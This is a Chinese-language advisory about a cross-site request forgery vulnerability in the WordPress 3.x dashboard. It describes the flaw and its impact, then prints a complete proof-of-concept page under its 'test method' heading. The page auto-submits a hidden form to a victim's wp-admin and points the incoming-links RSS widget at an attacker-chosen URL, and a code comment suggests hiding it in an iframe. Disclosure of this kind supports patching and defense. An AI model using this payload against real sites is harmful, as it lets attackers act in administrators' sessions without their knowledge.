WordPress跨站请求伪造漏洞

漏洞起因
输入验证错误
危险等级

影响系统
WordPress 3.x

不受影响系统

危害
远程攻击者可以利用漏洞以目标用户上下文执行任意操作。

攻击所需条件
攻击者必须构建恶意URI,诱使用户解析。

漏洞信息
WordPress是一款使用PHP语言开发的内容管理系统。
WordPress存在输入验证错误,允许攻击者利用漏洞进行跨站请求伪造攻击,可构建恶意URI,诱使用户解析,可以目标用户上下文执行任意操作。

测试方法
<body onload=”javascript:document.forms[0].submit()”> <form action=”http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links” method=”post”> <h1>How Many Girls You Have? xD))</h1> <!– Idea for you: Iframe it –> <input name=”widget-rss[1][url]” type=”hidden” value=”http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php” /> <select id=”rss-items-1″ name=”widget-rss[1][items]”> <option value=’1′ >1</option> <option value=’2′ >2</option> <option value=’3′ >3</option><option value=’4′ >4</option> <option value=’5′ >5</option> <option value=’6′ >6</option> <option value=’7′ >7</option> <option value=’8′ >8</option> <option value=’9′ >9</option> <option value=’10’ >10</option> <option value=’11’ >11</option> <option value=’12’ >12</option> <option value=’13’ >13</option> <option value=’14’ >14</option> <option value=’15’ >15</option> <option value=’16’ >16</option> <option value=’17’ >17</option> <option value=’18’ >18</option> <option value=’19’ >19</option> <option value=’20’ selected=’selected’>20</option> </select> <input id=”rss-show-date-1″ name=”widget-rss[1][show_date]” type=”checkbox” value=”1″ checked=”checked”/> <input type=”hidden” name=”widget_id” value=”dashboard_incoming_links” /> </form>

厂商解决方案
目前没有详细解决方案提供:
http://wordpress.org

漏洞提供者
AkaStep

评论关闭。